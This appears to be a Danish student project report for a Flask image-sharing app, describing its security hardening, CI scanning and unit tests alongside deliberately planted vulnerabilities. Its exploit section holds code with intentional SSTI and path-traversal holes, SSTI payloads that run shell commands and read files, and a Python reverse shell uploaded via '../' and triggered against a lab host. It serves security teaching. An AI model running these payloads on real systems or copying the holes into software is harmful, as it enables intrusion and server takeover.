---
title: "Secure version of imagesharing"
author: "Gruppe 1"
date: "15-11-2022"
titlepage: true
titlepage-color: "e3e1e1" 
---
- [Installationsguide](#installationsguide)
  - [Sikkerhedstiltag](#sikkerhedstiltag)
  - [Mangler](#mangler)
  - [Usikkerheder](#usikkerheder)
- [Beskrivelse af sikkerhedstiltag](#beskrivelse-af-sikkerhedstiltag)
  - [flask-talisman](#flask-talisman)
    - [The default configuration](#the-default-configuration)
    - [Content Security Policy (CSP)](#content-security-policy-csp)
    - [HSTS](#hsts)
  - [Hashing af passwords](#hashing-af-passwords)
  - [Regex kontrol af password](#regex-kontrol-af-password)
  - [Autoescaping for at forhindre XSS](#autoescaping-for-at-forhindre-xss)
  - [Securefilename](#securefilename)
  - [Flask-SQLAlchemy](#flask-sqlalchemy)
    - [Parametisering vha. SQLAlchemy](#parametisering-vha-sqlalchemy)
  - [Flask-WTF CSRF Protection](#flask-wtf-csrf-protection)
  - [Flask-Login](#flask-login)
  - [HTTPS](#https)
  - [kontrol af filtype](#kontrol-af-filtype)
  - [logging](#logging)
  - [Cookies](#cookies)
    - [remember\_token](#remember_token)
    - [session cookie](#session-cookie)
    - [\_csrf\_token](#_csrf_token)
  - [Headers](#headers)
  - [Nikto scan på sikker app](#nikto-scan-på-sikker-app)
- [Exploits](#exploits)
  - [SSTI (Server Side Template Injection)](#ssti-server-side-template-injection)
  - [File Upload path traversal](#file-upload-path-traversal)
  - [SSTI angreb](#ssti-angreb)
    - [Reverse shell](#reverse-shell)
- [Dependencies](#dependencies)
- [CI / CD](#ci--cd)
  - [Dependency scanning](#dependency-scanning)
  - [Static Application Security Testing (SAST)](#static-application-security-testing-sast)
  - [Secret detection](#secret-detection)
  - [Dynamic Application Security Testing (DAST)](#dynamic-application-security-testing-dast)

\pagebreak

# Installationsguide

Docker image laves ved at køre følgende kommando i roden af projektet:

```bash
docker build -t imagesharing .
```

Docker image køres ved at køre følgende kommando:

```bash
docker run -p 5000:5000 imagesharing
```

## Sikkerhedstiltag

- Hashing af passwords
- Autoescaping for at forhindre XSS
- Parametisering vha. SQLAlchemy
- Read once password
- CSP header + HSTS Talisman
- Brug af HTTPS
- kontrol af tiltype
- kontrol af filstørrelse
- Brug af securefilename
- regex kontrol af password
- Gitlab CI Dependency scanning
- Gitlab CI SAST (static code analysis)
- Logging og HTTP fejl ved loginfejl 
- unittests

## Mangler


## Usikkerheder

- Server Side Template Injection (SSTI)
- File upload path traversal

# Beskrivelse af sikkerhedstiltag

## flask-talisman

Flask-talisman er en flask extension som sætter HTTP headers som kan hjælpe med at beskytte mod nogle almindelige web applikation sikkerheds problemer.

### The default configuration

- Forces all connects to https, unless running with debug enabled.
- Enables HTTP Strict Transport Security (HSTS).
- Sets Flask's session cookie to secure, so it will never be set if your application is somehow accessed via a non-secure connection.
- Sets Flask's session cookie to httponly, preventing JavaScript from being able to access its content. CSRF via Ajax uses a separate cookie and should be unaffected.
- Sets X-Frame-Options to SAMEORIGIN to avoid clickjacking.
- Sets X-XSS-Protection to enable a cross site scripting filter for IE and Safari (note Chrome has removed this and Firefox never supported it).
- Sets X-Content-Type-Options to prevent content type sniffing.
- Sets a strict Content Security Policy of default-src: 'self'. This is intended to almost completely prevent Cross Site Scripting (XSS) attacks.
- Sets a strict Referrer-Policy of strict-origin-when-cross-origin that governs which referrer information should be included with requests made.

In addition to Talisman, you should always use a cross-site request forgery (CSRF) library. It's highly recommended to use Flask-SeaSurf, which is based on Django's excellent library.

### Content Security Policy (CSP)

Content-Security-Policy giver dig mulighed for at begrænse, hvordan ressourcer såsom JavaScript, CSS eller stort set alt, hvad browseren indlæser.
Når den sættes, vil browseren ikke læse indholdet af ressourcerne, medmindre de er tilladt i CSP headeren.
en CSP header kan se sådan her ud:

```
Content-Security-Policy: default-src 'self'; script-src 'self' https://apis.google.com; object-src 'none'
```

Denne header tillader at indlæse JavaScript fra samme domæne, og fra Google's API'er. Det tillader ikke at indlæse objekter, såsom Flash eller Java applets.

### HSTS

HSTS er en HTTP header, der fortæller browseren at den kun skal bruge HTTPS til at kommunikere med serveren. Hvis den forsøger at bruge HTTP, vil den blive omdirigeret til HTTPS.
HSTS headeren ser sådan her ud:

```
Strict-Transport-Security: max-age=31536000; includeSubDomains
```

## Hashing af passwords

Når en bruger opretter sig, bliver passwordet hashet med bcrypt. Bcrypt er en hashfunktion, der er designet til at være langsom. Det gør det svært for angribere at bruge brute force til at gætte passwordet.
Når en bruger logger ind, bliver passwordet hashet med bcrypt og derefter sammenlignet med det hashede password, der er gemt i databasen. Hvis de to hashes er ens, er passwordet korrekt.

## Regex kontrol af password

Når en bruger opretter sig, bliver passwordet kontrolleret med en regex. Regex'en kræver at passwordet indeholder mindst 8 tegn, mindst 1 lille bogstav, mindst 1 stort bogstav, mindst et specialttegn og mindst 1 tal. Hvis passwordet ikke opfylder kravene, bliver brugeren bedt om at vælge et nyt password.
eks.:

```
^(?=.*?[A-Z])(?=.*?[a-z])(?=.*?[0-9])(?=.*?[#?!@$%^&*-]).{8,}$
```

## Autoescaping for at forhindre XSS

jinja2 er templating systemet, der bruges i Flask. Det har en funktion, der hedder autoescape, der gør, at alt indhold, der bliver sendt til en template, bliver escaped. Det gør det svært for angribere at udføre XSS angreb.
eks:

```
{{ user.username | safe }}
```

safe er et filter, der fortæller jinja2, at det ikke skal escape indholdet.

## Securefilename

Securefilename er en funktion, der gør, at filnavne bliver ændret, så de kun indeholder bogstaver, tal og bindestreger. Det gør det svært for angribere at uploade filer med skadelig kode.
eks.:

```
filename = secure_filename(file.filename)
```

## Flask-SQLAlchemy

Flask-SQLAlchemy er et Flask-ekstensionsbibliotek, der giver dig mulighed for at bruge SQLAlchemy med din Flask-applikation. Det giver dig mulighed for at bruge ORM (Object Relational Mapping) til at arbejde med din database.
en ORM er et bibliotek, der giver dig mulighed for at arbejde med en database ved hjælp af objekter og metoder i stedet for at skrive SQL.
eks.:

```
class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    email = db.Column(db.String(120), unique=True, nullable=False)
    password = db.Column(db.String(120), unique=True, nullable=False)
```

### Parametisering vha. SQLAlchemy

eks.:

```
user = User.query.filter_by(username=username).first()
```

## Flask-WTF CSRF Protection

Flask-WTF er et Flask-ekstensionsbibliotek, der bl.a giver dig mulighed for at beskytte mod Cross-Site Request Forgery (CSRF) angreb.
CSRF er et angreb, hvor en bruger, der er logget ind på en webside, bliver tvunget til at udføre en handling, som de ikke ønsker, på en anden webside. Det sker ved at bruge en anden webside til at sende en falsk forespørgsel til den første webside, som den første webside vil behandle som en gyldig forespørgsel.
Denne beskyttelse implementeres ved at tilføje en CSRF token til alle formularer. Når en formular bliver sendt, bliver CSRF tokenet sammenlignet med det token, der er gemt i sessionen. Hvis de to er ens, er formularen gyldig. Hvis de to ikke er ens, er formularen ugyldig.
eks.:

```html
input type="hidden" name="csrf_token" value="{{ csrf_token() }}"
```

## Flask-Login

Flask-Login giver dig mulighed for at håndtere brugerlogins til din Flask-applikation. Det giver dig mulighed for at logge brugere ind og ud, og for at beskytte visse sider mod brugere som ikke er logget ind.

## HTTPS

HTTPS er en sikker version af HTTP. Det bruger SSL/TLS til at kryptere data, der sendes mellem en browser og en server. Det gør det svært for angribere at læse data, der sendes mellem en browser og en server.
HTTPS er enabled i main.py ved at sætte app.run() til at bruge ssl_context='adhoc'.
Alternativt kan man benytte et self-signed certifikat ved at sætte app.run() til at bruge `ssl_context=('cert.pem', 'key.pem')`.

adhoc:

```
app.run(host='0.0.0.0', port=5000, ssl_context='adhoc')
```

self-signed certifikat:

```
app.run(host='0.0.0.0', port=5000, ssl_context=('cert.pem', 'key.pem'))
```

## kontrol af filtype

jpg, png, jpeg og gif filer kan uploades. Alle andre filer bliver afvist.
eks.:

```
if file and allowed_file(file.filename):
```

ALLOWED_EXTENSIONS er en liste, der indeholder de filtyper, der kan uploades.
eks.:

```
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}
```

## logging

HTTP fejl bliver logget i en fil, der hedder error.log. Flask logger også alle forespørgsler, der bliver sendt til serveren.
eks.:

```
app.logger.error('A error occurred')
```

## Cookies

### remember_token

Når en bruger logger ind, bliver der genereret et remember_token, der bliver gemt i databasen. Når en bruger logger ind, bliver remember_token sammenlignet med det remember_token, der er gemt i databasen. Hvis de to er ens, er brugeren logget ind. Hvis de to ikke er ens, er brugeren ikke logget ind.

### session cookie

session cookie bliver brugt til at holde styr på, hvilken bruger, der er logget ind. Den bliver slettet, når brugeren logger ud.

### _csrf_token

Når en bruger logger ind, bliver der genereret et CSRF token, der bliver gemt i sessionen. Når en bruger udfører en handling, bliver CSRF token sammenlignet med det CSRF token, der er gemt i sessionen. Hvis de to er ens, er handlingen gyldig. Hvis de to ikke er ens, er handlingen ugyldig.

## Headers

![](docs/headers.png)

`X-Frame-Options: SAMEORIGIN` headeren gør, at websiden ikke kan blive indlejret i en anden webside. Det gør det svært for angribere at udføre Clickjacking angreb.

`X-XSS-Protection: 1; mode=block` headeren gør, at browseren vil blokere indhold, der bliver sendt til websiden, hvis det indeholder XSS. Det gør det svært for angribere at udføre XSS angreb.

`X-Content-Type-Options: nosniff` headeren gør, at browseren vil blokere indhold, der bliver sendt til websiden, hvis det ikke har den rigtige Content-Type. Det gør det svært for angribere at udføre Content-Type angreb.

`Content-Security-Policy: default-src 'self'; object-src 'none'` headeren gør, at browseren kun vil tillade indhold, der bliver sendt til websiden, hvis det er fra samme domæne. Det gør det svært for angribere at udføre Content-Security-Policy angreb.

`Strict-Transport-Security: max-age=31556926; includeSubDomains` headeren gør, at browseren kun vil tillade indhold, der bliver sendt til websiden, hvis det er via HTTPS.

`Referrer-Policy: strict-origin-when-cross-origin` headeren gør, at browseren kun vil sende referrer headeren, hvis det er til samme domæne. Det gør det svært for angribere at udføre Referrer-Policy angreb.

## Nikto scan på sikker app

Containeren scannes med Nikto, der er et webserver scanner, der kan bruges til at finde sikkerhedshuller i webservere. 

Følgende kommando bruges til at scanne webserveren:

`nikto -host 127.0.0.1:5000`

![img.png](docs/nikto_scan_secure.png)

# Exploits

## SSTI (Server Side Template Injection)

Flask bruger Jinja2 som sin template engine. Jinja2 genererer HTML ved at bruge templates. Templates kan indeholde Python kode, der bliver udført, når templates bliver genereret. Dette giver mulighed for at udføre SSTI angreb hvis ikke disse templates bliver sikret.  
Dette sikres ved at autoescape al brugerinput. Dette gør, at alle HTML tags og jinja2 tags bliver escaped, så de ikke bliver udført.

**Muliggørelse af Server Side Template Injection**

```python
    if not img:
        #return 'Img Not Found: ' + id, 404
        #vulnerable to SSTI
        return render_template_string('Img Not Found: ' + id), 404
```

”render_template_string()” renderer input som en template. Her består fejlen i at ”id” variablen ikke bliver escaped. Hvis en bruger kan ændre værdien af denne variabel, så kan brugeren udføre SSTI angreb.

## File Upload path traversal

Hvis webapplikationen ikke kontrollerer filnavnet og filtypen, kan en bruger udføre path traversal angreb. Her kan en bruger uploade en fil, der har et filnavn, som indeholder `../`. Dette vil gøre, at filen bliver gemt i en anden mappe end den mappe, der er angivet i `UPLOAD_FOLDER`.

Herunder ses sårbarheden ved at der ikke bruges `secure_filename()` og at filtypen ikke kontrolleres med `allowed_file()`.

```python
        #insecure filename
        filename = file.filename

        #Secure filename
        #filename = secure_filename(file.filename)

        if not filename: #or not allowed_file(filename):
            return 'Bad upload!', 400
```



## SSTI angreb

For at finde ud af om siden er sårbar overfor SSTI, kan man prøve at sende følgende payload til siden:

```
{{7+7}}
```

```
https://172.28.109.119:5000/showimage/{{7+7}}/
```

Denne vil returnere 14, hvis siden er sårbar overfor SSTI.
Det vil se således ud i browseren:

![img.png](docs/SSTI_browser.png)

**eks. giver denne request en SSTI exception som viser de filer, der ligger i mappen, hvor main.py ligger:**

```
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
```

**Dette kan udnyttes til at få adgang til filer, der ligger på serveren. eks. giver denne request en SSTI exception som viser indholdet af main.py:**

```
{{config.__class__.__init__.__globals__['os'].popen('cat main.py').read()}}
```

**Denne viser flaget:**

```
{{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}
```

### Reverse shell

**revsh.sh:**

```bash
export RHOST=192.168.29.128
export RPORT=12345
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'
```

**revsh.sh uploades til serveren med følgende path ved hjælp af burp:**

```
------WebKitFormBoundarysgUREQITBLgD4WSF
Content-Disposition: form-data; name="file"; filename="../../../../revsh.sh"
Content-Type: application/x-shellscript

export RHOST=192.168.29.128
export RPORT=12345
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'
```

Grunden til at pathen er `../../../../` er fordi, at der er 4 mapper tilbage fra mappen, hvor main.py ligger.

**path for revsh.sh valideres:**

```
{{config.__class__.__init__.__globals__['os'].popen('ls -la').read()}}
```

**Rettighederne sættes til +x med følgende kommando:**

```
{{config.__class__.__init__.__globals__['os'].popen('chmod +x revsh.sh').read()}}
```

**Der oprettes en listener på port 12345 med følgende kommando på kali boksen:**

```
nc -lvnp 12345
```

**revsh.sh køres med følgende kommando:**

```
{{config.__class__.__init__.__globals__['os'].popen('sh revsh.sh').read()}}
```

**Rev shell er nu oprettet:**

![img.png](docs/nc_rev_sh.png)

# Dependencies
`bcrypt==4.0.1` Er et password hashing bibliotek til flask. Det bruges til at hashe passwords, så de ikke bliver gemt i klartekst i databasen.

`cffi==1.15.1 `

`click==8.1.3` er et bibliotek til flask, der bruges til at håndtere kommandoer i terminalen.

`cryptography==38.0.3` er et bibliotek til flask, der bruges til at håndtere kryptering.

`Flask==2.2.2` er et web framework til python.

`Flask-Bcrypt==1.0.1` er et flask bibliotek, der bruges til at hashe passwords. Denne er afhængig af bcrypt.

`Flask-Login==0.6.2`  er et flask bibliotek, der bruges til at håndtere login. 

`Flask-SQLAlchemy==2.5.1` er et flask bibliotek, der bruges til at håndtere databaser.

`flask-talisman==1.0.0` er et flask bibliotek, der bruges til at håndtere sikkerhed.

`Flask-WTF==1.0.1` er et flask bibliotek, der bruges til at håndtere forms. Heriblandt CSRF tokens og upload.

`greenlet==2.0.0 `

`importlib-metadata==5.0.0` er et bibliotek til flask, der bruges til at håndtere imports.

`itsdangerous==2.1.2` er et bibliotek til flask, der bruges til at håndtere sikkerhed.

`Jinja2==3.1.2` er et bibliotek til flask, der bruges til at håndtere templates.

`MarkupSafe==2.1.1` Håndterer escaping af specialtegn i templates.

`pycparser==2.21 `

`pyOpenSSL==22.1.0 `håndterer kryptering.

`SQLAlchemy==1.4.41` håndterer databaser (ORM).

`Werkzeug==2.2.2` Er en del af flask. Håndterer bl.a routing. 

`WTForms==3.0.1 `er et bibliotek, der bruges til at håndtere forms. Heriblandt CSRF tokens og upload.

`zipp==3.10.0` er et bibliotek til flask, der bruges til at håndtere imports.

`pip-audit` tester for sikkerhedsproblemer i dependencies.

`gunicorn` er en web server, der bruges til at hoste flask applikationen.

# CI / CD
Continuous integration og continuous deployment er en måde at sikre, at koden er i orden, før den bliver deployed til produktion.

`gitlab-ci.yml` filen er konfigurationsfilen til gitlab-ci. Denne fil fortæller gitlab, hvordan den skal bygge og teste koden.

Gitlab har sine egne testing tools, som kan bruges til at teste koden. Disse templates kan kaldes i gitlab-ci.yml filen.

Unittests kan også tilføjess i gitlab-ci.yml filen, som ses herunder:

```yaml
include:
- template: Security/Dependency-Scanning.gitlab-ci.yml
- template: Security/SAST.gitlab-ci.yml
- template: Security/Secret-Detection.gitlab-ci.yml

stages:
- test

sast:
  variables:
    SAST_EXCLUDED_ANALYZERS: brakeman, flawfinder, kubesec, nodejs-scan, phpcs-security-audit,
      pmd-apex, security-code-scan, sobelow, spotbugs
  stage: test

unit-tests:
  image: python:3.8
  stage: test
  before_script:
    - pip install -r requirements.txt
  script:
    - python3 -m unittest tests/test_createUser.py
```

## Dependency scanning
Dependency scanning er en måde at teste for sikkerhedsproblemer i dependencies. Gitlabs egen dependency scanning tool klarer dette for os.

## Static Application Security Testing (SAST)
Med GitLab CI/CD, kan man bruge Static Application Security Testing (SAST) til at kontrollere din kildekode for kendte sårbarheder. Resultaterne fremgår af en rapport, der kan ses i GitLab.
Resultaterne er sorteret efter sårbarhedens prioritet:

     Kritisk
     Høj
     Medium
     Lav
     Info
     Ukendt

 En pipeline kan bestå af flere job, inklusive SAST- og DAST-scanning. Hvis en af disse job fejler, vil hele pipeline fejle. 
 Semgrep understøtter Python, derfor er det valgt til at teste for sårbarheder i koden.i

## Secret detection
Secret detection undersøger alle filer i et projekt for at finde potentielle hemmeligheder. Det er en måde at sikre, at der ikke er gemt plaintext passwords, API keys, eller andre secrets i koden.
 
## Dynamic Application Security Testing (DAST)
Hvis du implementerer din webapplikation i et nyt miljø, kan din applikation blive udsat for nye typer angreb. For eksempel er fejlkonfigurationer af din applikation eller forkerte antagelser om sikkerhedskontrol muligvis ikke synlige fra kildekoden.
Dynamic Application Security Testing (DAST) undersøger applikationer for sårbarheder som disse i udrullede miljøer.


Stages i en pipeline kan se således ud:
```yaml
stages:
  - build
  - test
  - deploy
  - dast  
```

# Unit testing
Unit testing er en måde at teste for fejl i koden. 
Ved at opstille en række test af koden, kan udvikleren se om koden fungerer som den skal. Hvis en test fejler, kan udvikleren se, hvad der er galt med koden.
Der opstilles en række testscenarier, som koden skal kunne håndtere. Hvis koden ikke kan håndtere et testscenarie, fejler testen.
Et eksempel på et testscenarie kunne være, at en bruger skal kunne oprette en bruger. Hvis koden ikke håndterer forkert input, fejler testen.

## Gyldigt password
```python
    def test_with_valid_password(self):
        username = "testuser"
        password = "Password1!" # valid
        repassword = "Password1!"
        user = None
        self.assertTrue(auth.validate_user(username, password, repassword, user))
```
I dette eksempel testes, om en bruger kan oprette en bruger med et gyldigt password. Hvis koden ikke håndterer et gyldigt password, fejler testen.

## Eksisterende brugernavn
```python
    def test_with_invalid_username_already_exists(self):
        username = "testuser"
        password = "Password1!"
        repassword = "Password1!"
        user = "testuser"
        self.assertEqual(auth.validate_user(username, password, repassword, user), "Username already exists.")
```
I dette eksempel testes, om en bruger kan oprette en bruger med et eksisterende brugernavn. Hvis koden ikke håndterer et eksisterende brugernavn, fejler testen.

En godkendt test vil se således ud i terminalen:

![img_1.png](docs/valid_unittest.png)

En fejlet test vil se således ud i terminalen:

![img_1.png](docs/unittest_failed.png)


# password hashing + salting
Password hashing og salting er en måde at sikre, at passwords ikke bliver gemt i plaintext i databasen.
Hvis passwords bliver gemt i plaintext, kan de nemt blive stjålet, hvis databasen bliver hacket.

bcrypt eksempel:
```python 
    def hash_password(self, password):
        return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt())
```
